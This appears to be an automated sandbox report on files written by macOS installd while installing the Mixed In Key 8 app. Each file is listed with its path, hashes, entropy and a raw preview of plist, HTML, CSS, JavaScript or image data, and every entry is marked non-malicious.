                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top........1.......#.$.*...2.C.K.h.i.j.k.s.t.w...........................................................................'.+./.3.6.;.@.F.G.L.W.X.].b.g.o.p.s.v.w.|.......................................................................#.&.(.7.8.>.B.H.M.U.V.Z.[.^.k.l.q.u.y.............................................................#.)...4.:.@.F.L.Q.W.\.a.f.l.q.v.|.........................................................................F.I.J.....9.....3.............C.D.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.`.a.b.c.d.e.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.{.|.}.~.........Y..........................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............/..../.....0.... ...!."[NSClassName...._..MIKLicenseViewController..%.&.'.(
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_ylsnaz
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):552
                                                                                                    Entropy (8bit):3.754938410821478
                                                                                                    Encrypted:false
                                                                                                    MD5:ADE267DD9251C015A8BA6E64E884996C
                                                                                                    SHA1:AD0CFFE5FD769674C8F17DF298B73FCF004B0846
                                                                                                    SHA-256:DC821DBCC2E81B74BB7995A8EE2B9E791971B292684418F4F5B0121789D4D7B1
                                                                                                    SHA-512:1A1BE590F8D7A63DD9C1C603FEF33426A0C4906A5529F00D8431DBC27F71F596734851182635C92B544C5BAF7A5474951A33FA3C98D9629410A40A2971F32AE4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.8.".?.>...<.!.D.O.C.T.Y.P.E. .p.l.i.s.t. .P.U.B.L.I.C. .".-././.A.p.p.l.e././.D.T.D. .P.L.I.S.T. .1...0././.E.N.". .".h.t.t.p.:././.w.w.w...a.p.p.l.e...c.o.m./.D.T.D.s./.P.r.o.p.e.r.t.y.L.i.s.t.-.1...0...d.t.d.".>...<.p.l.i.s.t. .v.e.r.s.i.o.n.=.".1...0.".>...<.d.i.c.t.>.....<.k.e.y.>.N.S.H.u.m.a.n.R.e.a.d.a.b.l.e.C.o.p.y.r.i.g.h.t.<./.k.e.y.>.....<.s.t.r.i.n.g.>... .M.i.x.e.d. .I.n. .K.e.y. .L.L.C.,. .2.0.0.6. .-. .2.0.1.9.<./.s.t.r.i.n.g.>...<./.d.i.c.t.>...<./.p.l.i.s.t.>...
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_zzLsHz
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):34901
                                                                                                    Entropy (8bit):6.781306720341854
                                                                                                    Encrypted:false
                                                                                                    MD5:9C495C3356341B6A5B0845B6D274AF52
                                                                                                    SHA1:9C7815AD879DA2E3CC31152EF8FB3929E62B913E
                                                                                                    SHA-256:9E71E45D443879FD4D56708A2BD89CBE18767E6B3E987E1E4F41E51E557A5CDC
                                                                                                    SHA-512:9C73535FA31DD4A686210766A2E185F6000F1BA6CB902D47FB76BF59324EE063126CD4DC4DF718B34EFB52297FAEC788F3D1B7A357B2EAD3848987686706AFAA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............T.UX$versionX$objectsY$archiverT$top........9.......#.$.*...2.H.P.].k.l.m.r.x.y.z.{.~...............................................................A.B.C.V.Y.\.].g.h.i.s.t.{...........................................................!.,.-.3.4.7.>.C.D...I.J.S.T.d.e.h.k.t.u.y.z...........p.............................................................'.(.).1.2.6.7.:.E.H.I.U.V.W.[.\._.`.c.a.d.g.h.i.j.k.l.m.p.q.v.w.|...........................................................................................!.".*.+.,.6.7.8.9.A.B.C.M.N.O.P.W.X.Y.Z.c.d.e.f.n.o.p.v.w...............'.#...$.%.&.'.(.).*.+...,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>.?.@.A.B.C.D.E.F.G.H.I.J.K.L.M.N.QU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..............l...l..7..8..... ...!."[NSClassName...._..MIKMissingWindo
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/.BC.T_iR6lco
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):976
                                                                                                    Entropy (8bit):5.105485741649838
                                                                                                    Encrypted:false
                                                                                                    MD5:92BFCE18DDF9194FE31CD0664C2A82CD
                                                                                                    SHA1:BEC40D7A055D513762F1ACAD41BC8FC8C77A7A6C
                                                                                                    SHA-256:B69C7819208EF063A20FD071C45021A0F7CB51F2ED24E87479AFE8B50D40B1C7
                                                                                                    SHA-512:DE92D782C3DD6E9647697AB47F632E26E3E9B9B85EE7B47978D2636B9F62EBAE135E1AEA17C978CE8548762DC6AE3BA75B5612EF224D7A0154E17D24B0279B34
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>tableHeaderBackgroundImage</key>..<string>header-background.png</string>..<key>name</key>..<string>Default</string>..<key>version</key>..<integer>0</integer>..<key>mainThemeImage</key>..<string>main-theme.png</string>..<key>analysisMessageImage</key>..<string>analysis-message.tiff</string>..<key>topURL</key>..<string>html/top.html</string>..<key>labelColor</key>..<string>102 120 102</string>..<key>tableColor</key>..<string></string>..<key>tableHighLightColor</key>..<string>25 203 255</string>..<key>tableHighLightBackgroundImage</key>..<string>row-background.png</string>..<key>tableHighLightNoFocusBackgroundImage</key>..<string>row-background-nofocus.png</string>..<key>tableHighLightNoFocusColor</key>..<string></string>..<key>tableLinkColor</key>..<string>0 0 255</string>.</dict>.</plist>.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/html/.BC.T_bbxwTR
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C program text
                                                                                                    Size (bytes):1365
                                                                                                    Entropy (8bit):4.937763229891162
                                                                                                    Encrypted:false
                                                                                                    MD5:7366249E912217EB37327DDD26C91CF5
                                                                                                    SHA1:0FE27D2B2B10C0E80A7A85660626A9FA3CFC8957
                                                                                                    SHA-256:86783DCB04B7D13C9DFF3B47DAF1AA1B2462339D5E37CDE3CA0C4B587283BACD
                                                                                                    SHA-512:F354E70B8C7A5091000FDBA82DDD0C0F6D209AEBAFCEF9C880BD7ED8B56473129F9F766EC54D03E6F0EBAF9C4E9F82F77B71AEACA2B5D6B6DD41DAB8F9F19AE8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /*..Javascript for Mixed In Key top theme..Copyright 2008 Mixed In Key LLC.. */../*.The following functions are required for navigation. */..//.Selects the tab with the specified identifier after.//.the the pane selection changed in the appliation..//..function selectTab(tabId).{..if ( tabId == 'browse' ) {...document.getElementById('browse').className...= 'first tab selected';...document.getElementById('tagedit').className..= 'tab';...document.getElementById('personalize').className.= 'tab';..} else if ( tabId == 'tagedit' ) {...document.getElementById('browse').className...= 'first tab';...document.getElementById('tagedit').className..= 'tab selected';...document.getElementById('personalize').className.= 'tab';..} else if ( tabId == 'preferences' ) {...document.getElementById('browse').className...= 'first tab';...document.getElementById('tagedit').className..= 'tab';...document.getElementById('personalize').className.= 'tab selected';..} else {...document.getElementById('browse').cl
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/html/.BC.T_bn8p4h
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:HTML document text
                                                                                                    Size (bytes):1546
                                                                                                    Entropy (8bit):5.015020480535862
                                                                                                    Encrypted:false
                                                                                                    MD5:157F6800B8132247A46AFF4391D65B27
                                                                                                    SHA1:BDE682B657A278B12BC8B4C44E695435B9222F44
                                                                                                    SHA-256:99542796EDE3968AFA0FE944DE86887558A0C0AE992A840DB570B602715E5AB0
                                                                                                    SHA-512:90366B01338543E67F364E5FD80809ADDCD2E0E55F17D67BE06A2E1AF830709E1417B120E122EE6D2DEAADF4E20632E37FA8DE05E11B4ADFF7FEFEBD6E6EF5FA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN".."http://www.w3.org/TR/html4/strict.dtd">.<html>.<head>..<title></title>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<link rel="stylesheet" href="top.css" type="text/css" media="screen, print" charset="utf-8">..<script type="text/javascript" src="top.js" charset="utf-8"></script>.</head>.<body>..<div id="logo-left" onclick="selectTab('browse'); window.location='mik://browse'"></div>..<div id="menu-left">...<a id="browse" class="first tab selected" onclick="selectTab('browse');" href="mik://browse" title="Switch to the browse panel">....<span class="contents">Collection</span>...</a>...<a id="tagedit" class="tab" onclick="selectTab('tagedit');" href="mik://tagedit" title="Edit file tags">....<span class="contents">Tags</span>...</a>...<a id="personalize" class="tab" onclick="selectTab('preferences');" href="mik://personalize" title="Personalize your settings">....<span class="contents">Settings</span>...</a>..</
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/html/.BC.T_xj1ox5
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C program text
                                                                                                    Size (bytes):3808
                                                                                                    Entropy (8bit):5.252982103180177
                                                                                                    Encrypted:false
                                                                                                    MD5:41FEACAB6AC6F3756FF7A69B36582870
                                                                                                    SHA1:020B00230C07EADE7033FCD783A6D437AB832EFB
                                                                                                    SHA-256:229AB2959BB8F724BDBA9416C102791B8FC6FDD3DCBE49B5B37082A9361869E9
                                                                                                    SHA-512:C71ECF25E25507316AE3C8B6C75987516EF5C2FCB657CCB5AD5CD86948B6C470A7F629DECE79A408269F9CF5D0C42EBDEA49B1FBD57D286CB2411AFB61A888F0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /*..CSS for Mixed In Key top theme..Copyright 2008 - 2014 Mixed In Key LLC.. */..html {..height:70px;.}.body {..height:70px;..margin:0;..padding:0;..font:14px "Roboto";..background-color:rgb(0, 32, 78);..overflow:hidden;.}.#logo-left {..height:63px;..margin:0;..background:url("../images/mik-top-left.tiff") 15px 11px no-repeat;..background-size: 138px 52px;.}./*#logo-right {..position:absolute; right:0; top:0;..height:88px;..width:459px;..margin-right:20px;..background:url("../images/mik-top-right.tiff") no-repeat;..background-size: 459px 88px;.}.*/./* simulated tabs */./*#menu {..position:absolute;..top:24px;..left:262px;..height:40px;..background:url("../images/top-menutheme.png") repeat-x;..border-left:1px solid #c8c8c8;.}.a.tab {..display:table-cell;..margin:0;..padding:13px 15px 12px 15px;..border-left:1px solid transparent;..border-right:1px solid #c8c8c8;..text-align:center;..text-decoration:none;..color:rgb(120, 120, 120);.}.a.tab:hover {..background:url("../images/top-tab-hover
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_367S2v
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 56 x 56, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):2160
                                                                                                    Entropy (8bit):7.898414881972223
                                                                                                    Encrypted:false
                                                                                                    MD5:781CB2090B079031C608C0EDFF628A26
                                                                                                    SHA1:9A4114A762607A9FA34F356EE0F7523B188C17A5
                                                                                                    SHA-256:F5E9605AEDCA0134AAD16B2FEB441D4E163C106855457AFBC7F2183B80B31831
                                                                                                    SHA-512:CA54CBA0D89AC2B9530D1698BDE4F616E763E0F73CF98CB82B799B73DE05D613547B52BE8920E048A7A1688CD8274DBFD98259AFBAB661EC86E39787ED090222
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...8...8.......;.....iCCPICC Profile..x..T.k.A..6n..".Zk..x."IY.hE.6..bk....E.d3I.n6..&......*.E......z.d/J.ZE(..(b..-..nL.....~..7.}ov...r.4......R..il|Bj......A4%U..N$.A.s.{..z..[V.{.w.w........@.G..*...q.Y...<..).t.......9Nyx...+=.Y"|@5-..M.S.%.@.H8..qR>.......inf....O......b..N......~N..>.!....?F......?.a.....=..5..`.....5.._.M'.Tq.......V.J.p.8.da.sZHO.Ln....}&....wVQ.y..g....E...0.......HP.E.a..P@.<.14.r?#....{2u$j.tbD.A{6.=.Q..<.("q.C....A.*..O.y..\..V........;..........sM^|..v.WG..yz....?.W.1..5..s...-_...)....U..K.uZ17..l.;=......s...7V..g.jH......U.O^...g..c.)1&v..!.......K...`m.....).m..$.``.../]?[x.F...Q....T....*d4...o...........(./l....mSq...e.ns.....}..nk.~8..X<...R5. ...v.z..).....9R.,.....bR.P.CRR.%.eK...Ub.v....n..9B...Je........R...R.~N.....o...E.x.....=IDATh..[[N.1.m.|.Iw.....:. .*..X.e...PV.].....bV.t..+h.y...=.83~Ll*ai......~.3....~HY...........K...@...*.>L..._ZZ....S.s,... A===.B.....G.O..q....R.]......g..X.(.JOnooYw*..nnn..I....d5^H".G777.X."V.Q.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_4FxNjF
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TIFF image data, big-endian
                                                                                                    Size (bytes):108888
                                                                                                    Entropy (8bit):7.9579195875467565
                                                                                                    Encrypted:false
                                                                                                    MD5:3E2796C3A8DFE433D22DB7CC414E1EF5
                                                                                                    SHA1:DF83591755ABFD478A81F95C2942AE689B2ECE68
                                                                                                    SHA-256:DA74013E33AE2387D36F1723714FB85FDACEBD7F46E61579D8C7CA993295547F
                                                                                                    SHA-512:B6BFDA7FC5B30798416454759C3ACB7C519E5D17DAB91A18AE925A6B422ECAF7AFD537E36F78575D41D537B340708A5C8D1A56E72B761A8E033127881DE75B7A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: MM.*..^..? @.$....BaP.d6...DbP......FcQ.K...{...h.rM...%2yd"W...ar...36.Mg0Y...8....)U.v.............t..V.A.?..w...W... H.J.=.X#..T.m=..a..l..r.^oQK,..{.`o.g...p.`qP.N.Q~.`...].....A. P....>.....E....3L..[...v8....D.Y%Q.....}>...H.............@...v/..../......~.^..H......>.......r=.n.y..C..~.......,..H.T.)(*... 0.....$..'y.~)M.N.7K.J......:.+,.@IdI..1J.....T......1....Bq."...3../.l|..1...;..........@ ...@...........J{L......tn..rt^..r:....:.4..#....*H.>...............Tl..NS4..:Sd.<E......."..G........"...O..TN.SO.cNMR.&.V..h....=X.J..(.su\..heYd.. .EMu...A/....@.!.....oYO.B..g..SX..... ..i.h .T..e.iX.k........h..I%...."X...[.D......x.......q....M...XRn..2;..........R..*..hE.....R.....]a.........Q..V...dK...f.ZP|.@.J..@......J......c.C]Mi...J.y&...s.;.i...M./..w....V.{|T.h\.U^a2.I.S.o..p....0....7i^...Wn..)..{,. {="...)jr.?@.0w..|c._..,Wz!.3.-.........K.~6]J'a0.w...._7....#.`.R..*.I.SG'...U-....kz_.x..w.../C...%.^...Wo~...|."hb.M...". +.........Y..b.(....>...u......IV.eU........Y=d.....
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_8tAVTB
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 36 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):467
                                                                                                    Entropy (8bit):7.235944718437383
                                                                                                    Encrypted:false
                                                                                                    MD5:EB4700EF433EE10C93AF199A79EC04A3
                                                                                                    SHA1:6D63C4F6A151DEAB58263A21DAB49E59A9CBEFE6
                                                                                                    SHA-256:1A3DDF0E0FF89A465CBEBA1C0A95B76E91CC097872E9B381365BB8639EC070D7
                                                                                                    SHA-512:BC56E7BD9C057068F049BBC914931C4B0AA9F02DA46C8A27AA5F9B51DD64E4E3BC3BCDD38F45A14FFE127E28171D15A399CEC79F9D3DCC8E2F5AE71AA2324037
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...$... .....z.......tEXtSoftware.Adobe ImageReadyq.e<...uIDATx.btqqa ....D .D.{..;.x*..'.P&2.X..V ^.......h >......T.Y.p.Q"..BC...!.E.zSh...A.dDq.....@e.9.....`s.;2..GK..%.A.i. .2.d=.B..i..`s.N2..AK....7$..JK..*V/......Z..g../.j...=...O....jO..A.@....t.B.l...c........).....P'...F@.+...T.......Xb....h......R..%...$..c$..K.fl%Tl0.H'y........@...u.?.GU.9....C.O.vih.....y..4..t...q...Z..m&P.....k..1.].~....Q.... .A. !..D.r7h.9. ..aT<5v.[.....IEND.B`.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_BkGbL3
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 36 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):441
                                                                                                    Entropy (8bit):7.335516391981174
                                                                                                    Encrypted:false
                                                                                                    MD5:5AE62011E18E6128AD7BBEB645AA8B7D
                                                                                                    SHA1:2AE91233D93E73601221CD8270B5512BD5F6F558
                                                                                                    SHA-256:EC4AC790718CB25D3D55193A2ACFA791D153639C815876057FE912FD865499CA
                                                                                                    SHA-512:8C5E7D926DA9AAFC7573152FEA992030852110A65558B4F56A66C47950ADF58A305766BAFD383CB2B738583757F38AA2B91321EB45FC4AA8F7C7F1D8B5F36996
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...$... .....z.......tEXtSoftware.Adobe ImageReadyq.e<...[IDATx...MJ.A..G'G......... z.!kA..........Q.9........L.*..]...K...dQ..R.=.U.Ha..&.Y#....y-.:.\...%;...U.:.....-f........]f..!)x.@....:^%s.k.97C.........mn..uS.s.C...]....4t.F....m.....Cv~......c...H...2......6....L.);.5......!..........U...f...A.x..{.L..g..[&.Y.e.K.>").B.Q..H..]...2....Ku...w...:....h.5t"./....<=C{..S=e.....5CC.X......2...2w..0...)J........IEND.B`.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_EQM9Hs
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 44 x 44, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):1311
                                                                                                    Entropy (8bit):7.841926633046951
                                                                                                    Encrypted:false
                                                                                                    MD5:CAA146DCFBE758CC18AFB3600925697F
                                                                                                    SHA1:CFC5A002A0359814B0D96DFDE16478A3221140C7
                                                                                                    SHA-256:4639521D24D05DCFA67D8225D336285F0A822F968E7FDC779D32CFDEA8B22B5A
                                                                                                    SHA-512:009448ECDC4D7770A9EEB52A2B6B2B1E3776B4ABD58EEBA3AC46DA9D3C9A3602699805C7B03488B26A3F710E627C660050AA56AE2764A6D20F37E4AC2A95EF00
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...,...,.......Z.....iCCPICC Profile..x..T.k.A..6n..".Zk..x."IY.hE.6..bk....E.d3I.n6..&......*.E......z.d/J.ZE(..(b..-..nL.....~..7.}ov...r.4......R..il|Bj......A4%U..N$.A.s.{..z..[V.{.w.w........@.G..*...q.Y...<..).t.......9Nyx...+=.Y"|@5-..M.S.%.@.H8..qR>.......inf....O......b..N......~N..>.!....?F......?.a.....=..5..`.....5.._.M'.Tq.......V.J.p.8.da.sZHO.Ln....}&....wVQ.y..g....E...0.......HP.E.a..P@.<.14.r?#....{2u$j.tbD.A{6.=.Q..<.("q.C....A.*..O.y..\..V........;..........sM^|..v.WG..yz....?.W.1..5..s...-_...)....U..K.uZ17..l.;=......s...7V..g.jH......U.O^...g..c.)1&v..!.......K...`m.....).m..$.``.../]?[x.F...Q....T....*d4...o...........(./l....mSq...e.ns.....}..nk.~8..X<...R5. ...v.z..).....9R.,.....bR.P.CRR.%.eK...Ub.v....n..9B...Je........R...R.~N.....o...E.x......IDATX...KN.0..P.#.@.X.f.7...]r.8..#9.+V,...z.0.p..c....X.....e2q......Z...a..%.......a...pl`...........dD.o....<M.3>H....^)u.`.{5)..v.....@.....;j....=.......y.`.>.LS`.m.......s.)..-pJ?.......s...1....
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_I8zFwk
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 40 x 76, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):4309
                                                                                                    Entropy (8bit):7.883168293204685
                                                                                                    Encrypted:false
                                                                                                    MD5:66663506FF52DA921ED0EB28001D850E
                                                                                                    SHA1:2374E3A7DA1066BE2940B3BB907DD1BC81C5C45D
                                                                                                    SHA-256:58A735B284502F6215EF20EE522CA94253EB46608A89BF6E5FB14D93B1A933BC
                                                                                                    SHA-512:B1B6FA35C18140ACA4C90FF7E7FEA390A8DE86B1B3777409B6187982BA9DD94EE6115A0E4C9A3FE75CD018CB815400C4C6DDB577211F8B1B07B77CD16E0E2F56
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...(...L........!....iCCPICC Profile..H....TSY...{/..B..z.........PB.1!...Q.. "...C..G..X.Ql..R..dPQ.....}..vv.....|........n.=....\c.x......L~...=&6......Q..P`..<...@.j..W}.D...c2S....WI...,..P....V..g.8...3.@.h^+;.7.[Q.....\9...|r..f.....0O... P.L~2....<=.....`P6..9\..Qva.0.y(.=`...b......Ou..R3A\..L........#..3W..........C..J../lf>t...V......2...lO3."...c..3n..L..9..E..1.?.,'..1...a.....@q.D......s...a.qnJD..gq...X...0?.S.....='.}...!......+3%.o...q?.D/oq..).............+......f..l.S....uB...8 .0.+31gf_....U|NrJ&..=%.t..ejL.4...`.........%H.0.....Q.Mr.s...h.....|N;...G.8.....fs3[.`..H.Y.......&....'....?... .,.,..2..d.<....".........u..8.Z.9p.\.7A/........`.|.S...!*D.. uH.2.,!{......0(....!.$...MP.T..C..z...,t....A...h.z.}.........l....p.../....p.......j.8.._.o....~.O".!#...b..#.H...$!|d-R..".H#..t#w.......ah.:......DbX.......rL.........L`.c.X........`.....l).........a?.p8y..........V......p..>.(n...+......<.../....._.......d.:...C.#p.....c...~.3..Q..Ct$....U.....v.m
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_K0KtAb
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 146 x 150, 8-bit colormap, non-interlaced
                                                                                                    Size (bytes):10419
                                                                                                    Entropy (8bit):7.972878199886934
                                                                                                    Encrypted:false
                                                                                                    MD5:024BC5E07D0FD27565BDD69BFF536ACA
                                                                                                    SHA1:D3F8CE77BB32DEB533C16B29114E39B0B97124C1
                                                                                                    SHA-256:BFD5389E9936485AC6FBEC9190D2ADC110CDB4A2B04BC16EB8A547BAE1E1924F
                                                                                                    SHA-512:CC1EC72497B463FA43C934A88D5FE69E55D7CF357DB9417902742355DAF619ECEFC91A9D1AEA868E674FFE2E5EDCA4226CA0B1DCC0712F2E87D4E7CDE3F3DE8A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR..............4!.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...,PLTE.............................................................................................................................................................................................................................................................................................................9.u..'.IDATx.L|.c.<.,...)..,+9.=9.3....vo....w/....^WU...c[.D"t...F.!....BN......>....k.R.x.XJ.%616x..bi...=.-)...v.>.C...~.l.....4.BC.9L...1.....j..o..P..g..x...k..16.l..=......7.o......r.|.....d................}0g.?....9...=...........`...:...Rt.../<[-.,.0v,.-...s..~.C.m.......Y.....M`HZ}{.d..3W..3p.6.w.:.k,E.X+.N|....N;.U...b.X..Yp.x.......V.{b%....Ke..>N.....-.(.../.9...V.^......A..-...i......]{..X.....o6.l...}H.`..VfM.Mc..I.?..^"...........5...b..Z......^...m ....E..1..c.Uy).k.pI.....<...8V4.H. .x_...V.>V...........<%\..C.;.b_. ..>.t..ECA..}..k.....|.)&o.n.^.>............8..`.....? ..@..[..B6a
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_OtAidt
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 5 x 40, 8-bit/color RGB, non-interlaced
                                                                                                    Size (bytes):2845
                                                                                                    Entropy (8bit):7.908364260501814
                                                                                                    Encrypted:false
                                                                                                    MD5:E909F95EBF82FDF40D95E5C5B732B3A7
                                                                                                    SHA1:7DA7FD7DB57D3200BD4AE30B11B020DFDF89318C
                                                                                                    SHA-256:F4A59C69FC547BC9AB11CE89759398BDC5A56CE72973CA0D0B746A4569BBB916
                                                                                                    SHA-512:3E6A2C9806D97B1162DBBAAD515FE44997635A25F941D5618BCAE0A484929D268894699900A9CDB16CD8BE743B5D3209EC37EC09CCA22C908CEC93300110469D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR.......(......?.Z...CiCCPICC Profile..x...wTSY...{/...B..z.MJ...z.^E%$.B....WD.W..i."."....Y+.XX.../."......e_..e..........;s.....<.(..BQ&..@.H"...`...1....D....py.YA.....?/.3.u..L...u......a2?.......K..B...|A6..<..s%Y2.$...4.......QV.q..6.....d....Q.Y.Y....;P..#.......#...|.e.ti...7(.3..l.0..]"...l.2E...Ay...J.,N....24O.8.Y........g..vtd3}..........q.|&'3#.+Z...;......L.......,...._._..z.;.z...e...A..o.o..l.........fK,..e......... ..@..Y.a..%E".r........x...~.......a.y.......)H.J.%LYQy...R13;...0Y..bt...8+.Yy.....b..=*..2.(.m../..3EL...:...f. ./s....#./...7.....`hd...GW..}.$F.......2.(......\.~...d.....`......oB.........-................ ......R@...\.........{@9..5..4........ep...}.>..#........Ax... 5H.2.. .......@(.....dH.I.U.F..*....P..#t...].z....4.........aM......;..G...dx).......p5|.n./...>x.~.O!.!#.D.a!l...#qH."F. .H.R.4 mH'r..D&......abX.g./&...,...l..c.`.1..[.!.$.#.....a..~..l26...-..b....}...k.......p..X\*n%n.n...w.....M..x5........%.||.......?..C ...6.oB.AD.@
